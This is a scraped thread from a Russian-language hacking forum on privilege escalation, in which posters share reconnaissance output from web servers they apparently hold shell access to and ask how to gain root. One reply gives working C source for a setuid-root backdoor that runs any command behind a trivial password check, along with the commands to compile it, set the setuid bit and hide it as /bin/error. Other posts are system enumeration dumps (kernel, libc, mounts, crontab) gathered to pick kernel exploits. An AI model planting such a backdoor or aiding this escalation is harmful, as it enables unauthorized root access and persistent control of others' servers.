-r--r--r--   1 root        wheel   1.9K Jul 24 23:50 my.sh.old
drwxr-xr-x   5 root        wheel   1.0K Jan 13 13:29 nginx
drwxr-xr-x   3 root        wheel   512B Feb 16  2011 nginx.16
drwxr-xr-x   3 root        wheel   1.0K Mar 14  2011 nginx_14
drwxr-xr-x   2 root        wheel   512B Nov 17  2010 openldap
drwxr-xr-x   2 root        wheel   512B Nov 16  2010 pam.d
drwxr-xr-x   2 root        wheel   512B Nov 24  2010 pango
-rw-r--r--   1 root        wheel   478B Nov 26  2010 pear.conf
drwxr-xr-x   2 root        wheel   512B Dec  7 20:03 php
-r--r--r--   1 root        wheel   5.3K Jan  8 19:23 php-fpm.conf
-r--r--r--   1 root        wheel   5.1K Dec 16 02:28 php-fpm.conf.sample
-r--r--r--   1 root        wheel   3.6K Dec 21  2010 php-fpm.old
-rwxrwxrwx   1 root        wheel    36B Nov 18  2010 php-fpm_restart
-r--r--r--   1 root        wheel    47B Dec 16 02:28 php.conf
-r--r--r--   1 root        wheel    44K Jan 13 13:28 php.ini
-r--r--r--   1 root        wheel    45K Dec 16 02:28 php.ini-dist
-r--r--r--   1 root        wheel    48K Dec 16 02:28 php.ini-recommended
-r--r--r--   1 root        wheel   6.4K Nov 21  2010 php.ini.last
-r--r--r--   1 root        wheel    49K Sep 23 20:25 php.ini.last_
-r--r--r--   1 root        wheel    49K Dec  6 07:19 php.ini.old
-r--r--r--   1 root        wheel    45K Nov 17  2010 php.ini.origin
-r-xr-xr-x   1 root        wheel    22K Nov 29  2010 pop-before-smtp-conf.pl
-r--r--r--   1 root        wheel   1.0K Nov 29  2010 popd.conf
-r--r--r--   1 root        wheel   1.0K Nov 29  2010 popd.conf.default
drwxr-xr-x   2 root        wheel   512B Apr 21  2011 postfix
-rwxrwxrwx   1 root        wheel    36B Mar 14  2011 postfix-restart.sh
-rw-r--r--   1 root        wheel   2.4K Jan  8 13:48 proftpd.conf
-rw-r--r--   1 root        wheel   2.4K Oct  1 22:20 proftpd.conf.sample
-rwxr--r--   1 root        wheel    38B Oct  1 21:25 pure-ftpd-restart.sh
-r--r--r--   1 root        wheel    11K Oct  1 23:05 pure-ftpd.conf.old
-r--r--r--   1 root        wheel    11K Oct 16 15:41 pure-ftpd.conf.sample
-r--r--r--   1 root        wheel   1.7K Oct 16 15:41 pureftpd-ldap.conf.sample
-r--r--r--   1 root        wheel   3.4K Oct 16 15:41 pureftpd-mysql.conf.sample
-r--r--r--   1 root        wheel   2.8K Oct 16 15:41 pureftpd-pgsql.conf.sample
-r--r--r--   1 root        wheel    11K Oct  1 23:05 pureftpd.conf
drwxr-xr-x   2 root        wheel   512B Dec 16 02:28 rc.d
-r--r--r--   1 root        wheel   766B Nov 17  2010 rsyncd.conf
-r--r--r--   1 root        wheel   766B Nov 17  2010 rsyncd.conf.sample
-r--r--r--   1 root        wheel   1.4K Nov 17  2010 slsh.rc
drwxr-xr-x   2 root        wheel   512B Jan 12 14:37 ssh
-r--r--r--   1 root        wheel   1.4K Jan 30  2011 trafshow
-r--r--r--   1 root        wheel   1.5K Jan 30  2011 trafshow.dist
-r--r--r--   1 root        wheel   4.4K Nov 25  2010 wgetrc.sample
-rw-r--r--   1 root        wheel   3.5K Nov 17  2010 win-utf
-r--r--r--   1 root        wheel   339B Nov 17  2010 xml2Conf.sh
-r--r--r--   1 root        wheel   232B Nov 17  2010 xsltConf.sh

Можно что-то сделать?

Ereee · 13 Jan 2012

Bragal said:

Можно что-то сделать?
Click to expand...

Да. Например:
Файл 1.c
Code:
#include <stdio.h>
#include <stdlib.h>
main(int argc, char *argv[])
{
if(argc == 3){
if(strcmp(argv[1],"[COLOR=Red]root[/COLOR]") == 0){
setgid(0);
setuid(0);
system(argv[2]);
}
}
return 0;
}
А через скрипты:
Code:
gcc 1.c -o xren
chmod 755 xren
chmod +s xren
mv xren /bin/error
Запускаешь так:
Code:
/bin/error root id
Где root пароль, в коде выделил красным.

yarbabin · 14 Jan 2012

uname -a

Code:

Linux www 2.6.32-33-generic #72-Ubuntu SMP Fri Jul 29 21:07:13 UTC 2011 x86_64 GNU/Linux

ls -la /boot

Code:

total 29212
drwxr-xr-x  3 root root    4096 Aug 19 10:54 .
drwxr-xr-x 21 root root    4096 Dec 29 09:37 ..
-rw-r--r--  1 root root 2135539 Feb 28  2011 System.map-2.6.31-23-generic
-rw-r--r--  1 root root 2156784 Jul 29 17:52 System.map-2.6.32-33-generic
-rw-r--r--  1 root root  624449 Feb 28  2011 abi-2.6.31-23-generic
-rw-r--r--  1 root root  646334 Jul 29 17:52 abi-2.6.32-33-generic
-rw-r--r--  1 root root  105746 Feb 28  2011 config-2.6.31-23-generic
-rw-r--r--  1 root root  110578 Jul 29 17:52 config-2.6.32-33-generic
drwxr-xr-x  3 root root    4096 Aug 19 10:54 grub
-rw-r--r--  1 root root 7566636 Aug 18 17:26 initrd.img-2.6.31-23-generic
-rw-r--r--  1 root root 8361293 Aug 19 10:21 initrd.img-2.6.32-33-generic
-rw-r--r--  1 root root  160280 Mar 23  2010 memtest86+.bin
-rw-r--r--  1 root root    1336 Feb 28  2011 vmcoreinfo-2.6.31-23-generic
-rw-r--r--  1 root root    1336 Jul 29 17:53 vmcoreinfo-2.6.32-33-generic
-rw-r--r--  1 root root 3949024 Feb 28  2011 vmlinuz-2.6.31-23-generic
-rw-r--r--  1 root root 4051264 Jul 29 17:52 vmlinuz-2.6.32-33-generic

$ ls -la --full-time /lib/libc*

Code:

-rwxr-xr-x 1 root root 1572232 2011-01-21 17:23:56.000000000 -0500 /lib/libc-2.11.1.so
lrwxrwxrwx 1 root root      14 2011-08-18 17:03:40.042591780 -0400 /lib/libc.so.6 -> libc-2.11.1.so
lrwxrwxrwx 1 root root      14 2011-08-18 17:12:57.752587046 -0400 /lib/libcap.so.2 -> libcap.so.2.17
-rw-r--r-- 1 root root   18888 2010-03-08 16:46:22.000000000 -0500 /lib/libcap.so.2.17
-rw-r--r-- 1 root root  190840 2011-01-21 17:23:56.000000000 -0500 /lib/libcidn-2.11.1.so
lrwxrwxrwx 1 root root      17 2011-08-18 17:03:40.042591780 -0400 /lib/libcidn.so.1 -> libcidn-2.11.1.so
lrwxrwxrwx 1 root root      17 2011-08-18 17:08:55.812595843 -0400 /lib/libcom_err.so.2 -> libcom_err.so.2.1
-rw-r--r-- 1 root root   14584 2010-08-17 04:24:08.000000000 -0400 /lib/libcom_err.so.2.1
-rw-r--r-- 1 root root   43296 2011-01-21 17:23:56.000000000 -0500 /lib/libcrypt-2.11.1.so
lrwxrwxrwx 1 root root      18 2011-08-18 17:03:40.042591780 -0400 /lib/libcrypt.so.1 -> libcrypt-2.11.1.so
-rw-r--r-- 1 root root 1622304 2011-02-09 20:50:13.000000000 -0500 /lib/libcrypto.so.0.9.8

$ mount

Code:

/dev/sda1 on / type ext4 (rw,errors=remount-ro)
proc on /proc type proc (rw)
none on /sys type sysfs (rw,noexec,nosuid,nodev)
none on /sys/fs/fuse/connections type fusectl (rw)
none on /sys/kernel/debug type debugfs (rw)
none on /sys/kernel/security type securityfs (rw)
none on /dev type devtmpfs (rw,mode=0755)
none on /dev/pts type devpts (rw,noexec,nosuid,gid=5,mode=0620)
none on /dev/shm type tmpfs (rw,nosuid,nodev)
none on /var/run type tmpfs (rw,nosuid,mode=0755)
none on /var/lock type tmpfs (rw,noexec,nosuid,nodev)
none on /lib/init/rw type tmpfs (rw,nosuid,mode=0755)
none on /var/lib/ureadahead/debugfs type debugfs (rw,relatime)
binfmt_misc on /proc/sys/fs/binfmt_misc type binfmt_misc (rw,noexec,nosuid,nodev)

$ df -h

Code:

Filesystem            Size  Used Avail Use% Mounted on
/dev/sda1              71G  6.7G   61G  10% /
none                 1000M  276K  999M   1% /dev
none                 1004M  164K 1004M   1% /dev/shm
none                 1004M   80K 1004M   1% /var/run
none                 1004M     0 1004M   0% /var/lock
none                 1004M     0 1004M   0% /lib/init/rw
none                   71G  6.7G   61G  10% /var/lib/ureadahead/debugfs

$ cat /etc/issue

Code:

Ubuntu 10.04.3 LTS \n \l

$ cat /etc/crontab

Code:

# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# m h dom mon dow user	command
17 *	* * *	root    cd / && run-parts --report /etc/cron.hourly
25 6	* * *	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6	* * 7	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6	1 * *	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#

$ cat /proc/version

Code:

Linux version 2.6.32-33-generic (buildd@allspice) (gcc version 4.4.3 (Ubuntu 4.4.3-4ubuntu5) ) #72-Ubuntu SMP Fri Jul 29 21:07:13 UTC 2011

$ cat /proc/sys/vm/mmap_min_addr

Code:

$ pwd

Code:

/var/www/development/files

ls -la /usr/bin/staprun ничего не выводит
ничего ведь не выйдет?

Expl0ited · 14 Jan 2012

faza02 said:

uname -a

Code:

Linux www 2.6.32-33-generic #72-Ubuntu SMP Fri Jul 29 21:07:13 UTC 2011 x86_64 GNU/Linux

ls -la /boot

Code:

total 29212
drwxr-xr-x  3 root root    4096 Aug 19 10:54 .
drwxr-xr-x 21 root root    4096 Dec 29 09:37 ..
-rw-r--r--  1 root root 2135539 Feb 28  2011 System.map-2.6.31-23-generic
-rw-r--r--  1 root root 2156784 Jul 29 17:52 System.map-2.6.32-33-generic
-rw-r--r--  1 root root  624449 Feb 28  2011 abi-2.6.31-23-generic
-rw-r--r--  1 root root  646334 Jul 29 17:52 abi-2.6.32-33-generic
-rw-r--r--  1 root root  105746 Feb 28  2011 config-2.6.31-23-generic
-rw-r--r--  1 root root  110578 Jul 29 17:52 config-2.6.32-33-generic
drwxr-xr-x  3 root root    4096 Aug 19 10:54 grub
-rw-r--r--  1 root root 7566636 Aug 18 17:26 initrd.img-2.6.31-23-generic
-rw-r--r--  1 root root 8361293 Aug 19 10:21 initrd.img-2.6.32-33-generic
-rw-r--r--  1 root root  160280 Mar 23  2010 memtest86+.bin
-rw-r--r--  1 root root    1336 Feb 28  2011 vmcoreinfo-2.6.31-23-generic
-rw-r--r--  1 root root    1336 Jul 29 17:53 vmcoreinfo-2.6.32-33-generic
-rw-r--r--  1 root root 3949024 Feb 28  2011 vmlinuz-2.6.31-23-generic
-rw-r--r--  1 root root 4051264 Jul 29 17:52 vmlinuz-2.6.32-33-generic

$ ls -la --full-time /lib/libc*

Code:

-rwxr-xr-x 1 root root 1572232 2011-01-21 17:23:56.000000000 -0500 /lib/libc-2.11.1.so
lrwxrwxrwx 1 root root      14 2011-08-18 17:03:40.042591780 -0400 /lib/libc.so.6 -> libc-2.11.1.so
lrwxrwxrwx 1 root root      14 2011-08-18 17:12:57.752587046 -0400 /lib/libcap.so.2 -> libcap.so.2.17
-rw-r--r-- 1 root root   18888 2010-03-08 16:46:22.000000000 -0500 /lib/libcap.so.2.17
-rw-r--r-- 1 root root  190840 2011-01-21 17:23:56.000000000 -0500 /lib/libcidn-2.11.1.so
lrwxrwxrwx 1 root root      17 2011-08-18 17:03:40.042591780 -0400 /lib/libcidn.so.1 -> libcidn-2.11.1.so
lrwxrwxrwx 1 root root      17 2011-08-18 17:08:55.812595843 -0400 /lib/libcom_err.so.2 -> libcom_err.so.2.1
-rw-r--r-- 1 root root   14584 2010-08-17 04:24:08.000000000 -0400 /lib/libcom_err.so.2.1
-rw-r--r-- 1 root root   43296 2011-01-21 17:23:56.000000000 -0500 /lib/libcrypt-2.11.1.so
lrwxrwxrwx 1 root root      18 2011-08-18 17:03:40.042591780 -0400 /lib/libcrypt.so.1 -> libcrypt-2.11.1.so
-rw-r--r-- 1 root root 1622304 2011-02-09 20:50:13.000000000 -0500 /lib/libcrypto.so.0.9.8

$ mount

Code:

/dev/sda1 on / type ext4 (rw,errors=remount-ro)
proc on /proc type proc (rw)
none on /sys type sysfs (rw,noexec,nosuid,nodev)
none on /sys/fs/fuse/connections type fusectl (rw)
none on /sys/kernel/debug type debugfs (rw)
none on /sys/kernel/security type securityfs (rw)
none on /dev type devtmpfs (rw,mode=0755)
none on /dev/pts type devpts (rw,noexec,nosuid,gid=5,mode=0620)
none on /dev/shm type tmpfs (rw,nosuid,nodev)
none on /var/run type tmpfs (rw,nosuid,mode=0755)
none on /var/lock type tmpfs (rw,noexec,nosuid,nodev)
none on /lib/init/rw type tmpfs (rw,nosuid,mode=0755)
none on /var/lib/ureadahead/debugfs type debugfs (rw,relatime)
binfmt_misc on /proc/sys/fs/binfmt_misc type binfmt_misc (rw,noexec,nosuid,nodev)

ничего ведь не выйдет?

Click to expand...

Постить информацию о сервере по шаблону из первого поста!

gl0w · 15 Jan 2012

sh-3.2$ uname -a

Linux 2.6.18-238.19.1.el5 #1 SMP Fri Jul 15 07:31:24 EDT 2011 x86_64 x86_64 x86_64 GNU/Linux
Click to expand...

sh-3.2$ ls -la /boot

total 18864
drwxr-xr-x 4 root root 4096 Aug 19 11:48 .
drwxr-xr-x 22 root root 4096 Aug 19 11:51 ..
-rw-r--r-- 1 root root 163 Nov 9 2010 .vmlinuz-2.6.18-194.26.1.el5.hmac
-rw-r--r-- 1 root root 163 Jan 6 2011 .vmlinuz-2.6.18-194.32.1.el5.hmac
-rw-r--r-- 1 root root 163 Jul 15 2011 .vmlinuz-2.6.18-238.19.1.el5.hmac
-rw-r--r-- 1 root root 1243713 Nov 9 2010 System.map-2.6.18-194.26.1.el5
-rw-r--r-- 1 root root 1244821 Jan 6 2011 System.map-2.6.18-194.32.1.el5
-rw-r--r-- 1 root root 1261160 Jul 15 2011 System.map-2.6.18-238.19.1.el5
-rw-r--r-- 1 root root 66892 Nov 9 2010 config-2.6.18-194.26.1.el5
-rw-r--r-- 1 root root 66892 Jan 6 2011 config-2.6.18-194.32.1.el5
-rw-r--r-- 1 root root 67215 Jul 15 2011 config-2.6.18-238.19.1.el5
drwxr-xr-x 2 root root 4096 Aug 19 11:48 grub
-rw------- 1 root root 3196813 Nov 15 2010 initrd-2.6.18-194.26.1.el5.img
-rw------- 1 root root 2777571 Mar 15 2011 initrd-2.6.18-194.32.1.el5.img
-rw------- 1 root root 2791488 Aug 19 11:48 initrd-2.6.18-238.19.1.el5.img
drwx------ 2 root root 49152 Mar 15 2011 lost+found
-rw-r--r-- 1 root root 80032 Mar 16 2009 message
-rw-r--r-- 1 root root 112729 Nov 9 2010 symvers-2.6.18-194.26.1.el5.gz
-rw-r--r-- 1 root root 112807 Jan 6 2011 symvers-2.6.18-194.32.1.el5.gz
-rw-r--r-- 1 root root 113923 Jul 15 2011 symvers-2.6.18-238.19.1.el5.gz
-rw-r--r-- 1 root root 1955356 Nov 9 2010 vmlinuz-2.6.18-194.26.1.el5
-rw-r--r-- 1 root root 1955804 Jan 6 2011 vmlinuz-2.6.18-194.32.1.el5
-rw-r--r-- 1 root root 2097180 Jul 15 2011 vmlinuz-2.6.18-238.19.1.el5
Click to expand...

sh-3.2$ ls -la --full-time /lib/lib*

-rwxr-xr-x 1 root root 7664 2011-06-27 19:25:05.000000000 +0200 /lib/libBrokenLocale-2.5.so
lrwxrwxrwx 1 root root 22 2011-08-19 11:46:48.000000000 +0200 /lib/libBrokenLocale.so.1 -> libBrokenLocale-2.5.so
-rwxr-xr-x 1 root root 16704 2011-06-27 19:25:05.000000000 +0200 /lib/libSegFault.so
-rwxr-xr-x 1 root root 14128 2011-06-27 19:25:05.000000000 +0200 /lib/libanl-2.5.so
lrwxrwxrwx 1 root root 13 2011-08-19 11:46:48.000000000 +0200 /lib/libanl.so.1 -> libanl-2.5.so
lrwxrwxrwx 1 root root 15 2011-03-15 23:03:21.000000000 +0100 /lib/libblkid.so.1 -> libblkid.so.1.0
-rwxr-xr-x 1 root root 37316 2010-11-11 19:39:52.000000000 +0100 /lib/libblkid.so.1.0
-rwxr-xr-x 1 root root 1690396 2011-06-27 19:25:06.000000000 +0200 /lib/libc-2.5.so
lrwxrwxrwx 1 root root 11 2011-08-19 11:46:48.000000000 +0200 /lib/libc.so.6 -> libc-2.5.so
-rwxr-xr-x 1 root root 191708 2011-06-27 19:25:06.000000000 +0200 /lib/libcidn-2.5.so
lrwxrwxrwx 1 root root 14 2011-08-19 11:46:48.000000000 +0200 /lib/libcidn.so.1 -> libcidn-2.5.so
lrwxrwxrwx 1 root root 17 2011-03-15 23:03:21.000000000 +0100 /lib/libcom_err.so.2 -> libcom_err.so.2.1
-rwxr-xr-x 1 root root 6300 2010-11-11 19:39:52.000000000 +0100 /lib/libcom_err.so.2.1
-rwxr-xr-x 1 root root 43616 2011-06-27 19:25:06.000000000 +0200 /lib/libcrypt-2.5.so
lrwxrwxrwx 1 root root 15 2011-08-19 11:46:48.000000000 +0200 /lib/libcrypt.so.1 -> libcrypt-2.5.so
-r--r--r-- 1 root root 41914 2011-03-06 04:27:34.000000000 +0100 /lib/libdevmapper-event.a
lrwxrwxrwx 1 root root 26 2011-08-19 11:47:12.000000000 +0200 /lib/libdevmapper-event.so -> libdevmapper-event.so.1.02
-r-xr-xr-x 1 root root 16952 2011-03-06 04:27:39.000000000 +0100 /lib/libdevmapper-event.so.1.02
-r--r--r-- 1 root root 458948 2011-03-06 04:27:29.000000000 +0100 /lib/libdevmapper.a
lrwxrwxrwx 1 root root 20 2011-08-19 11:47:12.000000000 +0200 /lib/libdevmapper.so -> libdevmapper.so.1.02
-r-xr-xr-x 1 root root 148092 2011-03-06 04:27:39.000000000 +0100 /lib/libdevmapper.so.1.02
-rwxr-xr-x 1 root root 18812 2011-06-27 19:25:06.000000000 +0200 /lib/libdl-2.5.so
lrwxrwxrwx 1 root root 12 2011-08-19 11:46:48.000000000 +0200 /lib/libdl.so.2 -> libdl-2.5.so
lrwxrwxrwx 1 root root 13 2011-03-15 23:03:21.000000000 +0100 /lib/libe2p.so.2 -> libe2p.so.2.3
-rwxr-xr-x 1 root root 20192 2010-11-11 19:39:52.000000000 +0100 /lib/libe2p.so.2.3
lrwxrwxrwx 1 root root 16 2011-03-15 23:03:21.000000000 +0100 /lib/libext2fs.so.2 -> libext2fs.so.2.4
-rwxr-xr-x 1 root root 113764 2010-11-11 19:39:52.000000000 +0100 /lib/libext2fs.so.2.4
-rwxr-xr-x 1 root root 45192 2011-03-06 16:11:18.000000000 +0100 /lib/libgcc_s-4.1.2-20080825.so.1
lrwxrwxrwx 1 root root 28 2011-08-19 11:46:41.000000000 +0200 /lib/libgcc_s.so.1 -> libgcc_s-4.1.2-20080825.so.1
-rwxr-xr-x 1 root root 214572 2011-06-27 19:25:06.000000000 +0200 /lib/libm-2.5.so
lrwxrwxrwx 1 root root 11 2011-08-19 11:46:48.000000000 +0200 /lib/libm.so.6 -> libm-2.5.so
-rwxr-xr-x 1 root root 107924 2011-06-27 19:25:06.000000000 +0200 /lib/libnsl-2.5.so
lrwxrwxrwx 1 root root 13 2011-08-19 11:46:48.000000000 +0200 /lib/libnsl.so.1 -> libnsl-2.5.so
-rwxr-xr-x 1 root root 36416 2011-06-27 19:25:06.000000000 +0200 /lib/libnss_compat-2.5.so
lrwxrwxrwx 1 root root 20 2011-08-19 11:46:48.000000000 +0200 /lib/libnss_compat.so.2 -> libnss_compat-2.5.so
-rwxr-xr-x 1 root root 21948 2011-06-27 19:25:06.000000000 +0200 /lib/libnss_dns-2.5.so
lrwxrwxrwx 1 root root 17 2011-08-19 11:46:48.000000000 +0200 /lib/libnss_dns.so.2 -> libnss_dns-2.5.so
-rwxr-xr-x 1 root root 50848 2011-06-27 19:25:06.000000000 +0200 /lib/libnss_files-2.5.so
lrwxrwxrwx 1 root root 19 2011-08-19 11:46:48.000000000 +0200 /lib/libnss_files.so.2 -> libnss_files-2.5.so
-rwxr-xr-x 1 root root 22764 2011-06-27 19:25:06.000000000 +0200 /lib/libnss_hesiod-2.5.so
lrwxrwxrwx 1 root root 20 2011-08-19 11:46:48.000000000 +0200 /lib/libnss_hesiod.so.2 -> libnss_hesiod-2.5.so
-rwxr-xr-x 1 root root 46536 2011-06-27 19:25:06.000000000 +0200 /lib/libnss_nis-2.5.so
lrwxrwxrwx 1 root root 17 2011-08-19 11:46:48.000000000 +0200 /lib/libnss_nis.so.2 -> libnss_nis-2.5.so
-rwxr-xr-x 1 root root 55804 2011-06-27 19:25:06.000000000 +0200 /lib/libnss_nisplus-2.5.so
lrwxrwxrwx 1 root root 21 2011-08-19 11:46:48.000000000 +0200 /lib/libnss_nisplus.so.2 -> libnss_nisplus-2.5.so
-rwxr-xr-x 1 root root 135892 2011-06-27 19:25:06.000000000 +0200 /lib/libpthread-2.5.so
lrwxrwxrwx 1 root root 17 2011-08-19 11:46:48.000000000 +0200 /lib/libpthread.so.0 -> libpthread-2.5.so
-rwxr-xr-x 1 root root 78780 2011-06-27 19:25:06.000000000 +0200 /lib/libresolv-2.5.so
lrwxrwxrwx 1 root root 16 2011-08-19 11:46:48.000000000 +0200 /lib/libresolv.so.2 -> libresolv-2.5.so
-rwxr-xr-x 1 root root 46144 2011-06-27 19:25:06.000000000 +0200 /lib/librt-2.5.so
lrwxrwxrwx 1 root root 12 2011-08-19 11:46:48.000000000 +0200 /lib/librt.so.1 -> librt-2.5.so
-rwxr-xr-x 1 root root 91892 2011-03-06 05:51:56.000000000 +0100 /lib/libselinux.so.1
-rwxr-xr-x 1 root root 231848 2010-09-13 16:02:00.000000000 +0200 /lib/libsepol.so.1
lrwxrwxrwx 1 root root 12 2011-03-15 23:03:21.000000000 +0100 /lib/libss.so.2 -> libss.so.2.0
-rwxr-xr-x 1 root root 19008 2010-11-11 19:39:52.000000000 +0100 /lib/libss.so.2.0
lrwxrwxrwx 1 root root 19 2011-03-15 14:50:59.000000000 +0100 /lib/libtermcap.so.2 -> libtermcap.so.2.0.8
-rwxr-xr-x 1 root root 11636 2007-01-06 14:01:17.000000000 +0100 /lib/libtermcap.so.2.0.8
-rwxr-xr-x 1 root root 33852 2011-06-27 19:25:06.000000000 +0200 /lib/libthread_db-1.0.so
lrwxrwxrwx 1 root root 19 2011-08-19 11:46:48.000000000 +0200 /lib/libthread_db.so.1 -> libthread_db-1.0.so
-rwxr-xr-x 1 root root 13492 2011-06-27 19:25:06.000000000 +0200 /lib/libutil-2.5.so
lrwxrwxrwx 1 root root 14 2011-08-19 11:46:48.000000000 +0200 /lib/libutil.so.1 -> libutil-2.5.so
lrwxrwxrwx 1 root root 14 2011-03-15 23:03:21.000000000 +0100 /lib/libuuid.so.1 -> libuuid.so.1.2
-rwxr-xr-x 1 root root 14144 2010-11-11 19:39:52.000000000 +0100 /lib/libuuid.so.1.2
Click to expand...

sh-3.2$ mount

/dev/md1 on / type ext3 (rw)
none on /proc type proc (rw)
devpts on /dev/pts type devpts (rw,gid=5,mode=620)
/dev/mapper/vg00-usr on /usr type xfs (rw)
/dev/mapper/vg00-var on /var type xfs (rw,usrquota)
/dev/mapper/vg00-home on /home type xfs (rw,usrquota)
none on /tmp type tmpfs (rw)
none on /proc/sys/fs/binfmt_misc type binfmt_misc (rw)
tmpfs on /usr/local/psa/handlers/before-local type tmpfs (rw)
tmpfs on /usr/local/psa/handlers/before-queue type tmpfs (rw)
tmpfs on /usr/local/psa/handlers/before-remote type tmpfs (rw)
tmpfs on /usr/local/psa/handlers/info type tmpfs (rw)
tmpfs on /usr/local/psa/handlers/spool type tmpfs (rw,mode=0770,gid=31)
Click to expand...

sh-3.2$ df -h

Filesystem Size Used Avail Use% Mounted on
/dev/md1 3.7G 1.3G 2.5G 34% /
/dev/mapper/vg00-usr 44G 1.3G 43G 3% /usr
/dev/mapper/vg00-var 504G 5.5G 499G 2% /var
/dev/mapper/vg00-home
14G 4.5M 14G 1% /home
none 3.9G 1.1M 3.9G 1% /tmp
tmpfs 3.9G 0 3.9G 0% /usr/local/psa/handlers/before-local
tmpfs 3.9G 0 3.9G 0% /usr/local/psa/handlers/before-queue
tmpfs 3.9G 0 3.9G 0% /usr/local/psa/handlers/before-remote
tmpfs 3.9G 16K 3.9G 1% /usr/local/psa/handlers/info
tmpfs 3.9G 0 3.9G 0% /usr/local/psa/handlers/spool
Click to expand...

sh-3.2$ cat /etc/issue

CentOS release 5.6 (Final)
Kernel \r on an \m
Click to expand...

sh-3.2$ cat /etc/crontab

SHELL=/bin/bash
PATH=/sbin:/bin:/usr/sbin:/usr/bin
MAILTO=root
HOME=/

# run-parts
01 * * * * root run-parts /etc/cron.hourly
02 4 * * * root run-parts /etc/cron.daily
22 4 * * 0 root run-parts /etc/cron.weekly
42 4 1 * * root run-parts /etc/cron.monthly
Click to expand...

sh-3.2$ cat /proc/version

Linux version 2.6.18-238.19.1.el5 ([email protected]) (gcc version 4.1.2 20080704 (Red Hat 4.1.2-50)) #1 SMP Fri Jul 15 07:31:24 EDT 2011
Click to expand...

sh-3.2$ cat /proc/sys/vm/mmap_min_addr

4096
Click to expand...

sh-3.2$ pwd

/var/www/vhosts/********
Click to expand...

sh-3.2$ ls -la /usr/bin/staprun

ls: /usr/bin/staprun: No such file or directory
Click to expand...

Повышение прав [задай вопрос - получи ответ]

morgan black New Member

Expl0ited Members of Antichat

morgan black New Member

Expl0ited Members of Antichat

gl0w Member

Gonsalez New Member

Expl0ited Members of Antichat

gl0w Member

Expl0ited Members of Antichat

gl0w Member

SecondLife Elder - Старейшина

SEO.NEWBIE New Member

Expl0ited Members of Antichat

SecondLife Elder - Старейшина

Expl0ited Members of Antichat

Bragal New Member

Ereee Elder - Старейшина

yarbabin HACKIN YO KUT

Expl0ited Members of Antichat

gl0w Member

Useful Searches

Повышение прав [задай вопрос - получи ответ]

morgan black New Member

Expl0ited Members of Antichat

morgan black New Member

Expl0ited Members of Antichat

gl0w Member

Gonsalez New Member

Expl0ited Members of Antichat

gl0w Member

Expl0ited Members of Antichat

gl0w Member

SecondLife Elder - Старейшина

SEO.NEWBIE New Member

Expl0ited Members of Antichat

SecondLife Elder - Старейшина

Expl0ited Members of Antichat

Bragal New Member

Ereee Elder - Старейшина

yarbabin HACKIN YO KUT

Expl0ited Members of Antichat

gl0w Member